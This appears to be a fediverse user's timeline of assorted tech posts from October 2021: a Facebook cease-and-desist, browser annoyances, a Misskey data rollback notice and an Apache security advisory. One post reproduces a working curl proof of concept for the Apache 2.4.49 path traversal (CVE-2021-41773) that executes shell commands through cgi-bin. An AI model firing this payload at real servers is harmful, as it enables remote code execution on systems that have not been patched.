Silver lining for the clean slate: development has been paralyzed because I need to upgrade it to the new activitypub back end I wrote, activitypub-express, but I've been putting it off because it would require writing a difficult database migration to preserve the existing groups
"[...] Facebook sent me a cease-and-desist letter. The company demanded that I take down the tool. It also told me that it had permanently disabled my Facebook account ... Pointing to a provision in its terms of service that purports to bind even former users of Facebook, Facebook also demanded that I never again create a tool that interacts with Facebook or its many other services in any way."
(Note: No need to share that you deleted your account, sport. So did I.)
Oh, you now get like an actual warning on the Windows Update screen?
Subject: [oss-security] CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.
Ah, that over there was the CVE-2021-41773 Apache httpd 2.4.49 with mod-cgi PoC a couple of days ago: https://mobile.twitter.com/hackerfantastic/status/1445531829985968137
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
(Slightly optimized version from down that thread.)
Sure been a long time since I saw one of those 🙄
Not quite sure why Vivaldi on Linux immediately closes on Ctrl+q, even though "show exit confirmation dialog" is ticked in the settings...
Second time this hit me this week when I missed Ctrl+w (close tab) right next to it.
Yeah, I know, not a novel problem... No idea why it's coming up for me right now.
Stephen Colebourne's blog: Big problems at the timezone database
Lots of people are asking me how I make these drawings.
I begin by coding the 3d environment by hand in Moogle, I then export a bit map of the wireframe, I then open it in Noodle and clean up the lines.
Tomorrow is #MatchingMittwoch again. Until the end of the year, on every first Wednesday of the month, all individual donations will be boosted by 10% by #betterplaceOrg! We would be very happy if you supported us with your #Spende.
Here is your regular reminder that text messages (SMS) are neither private nor secure. This company handles billions of messages, yet it only managed to detect a hack after five years and doesn’t bother to disclose the scope of the breach. (Via @firstname.lastname@example.org)
CloudFlare blog has a good write-up:
(reminder, CloudFlare is part of the problem, not of the solution)
...while you can't (yet) log back in, you can read their peering automation blog post from a couple of months back: https://engineering.fb.com/2021/05/20/networking-traffic/peering-automation/
As a result of a critical system failure on October 3rd of 2021, Misskey.io has been rolled back to a backup made on April 4th of 2021.
In accordance with this, all account data has also been reset to the state it was in at the point this backup was made. We are greatly sorry for the inconvenience, but would like to ask users of remote instances that have followed users from Misskey.io between the above stated timespan to please cancel and re-follow the users that they have followed, as while it may seem like you are following them, this is not being correctly reflected.
Additionally, we would be happy if you could please spread the news of this post to as many people as you are able to.
Once again, we sincerely apologize for the great trouble caused by this incident and ask for both understanding and cooperation in this matter.
generic computer and internetworking geek
network and systems administration, infosec, retrocomputing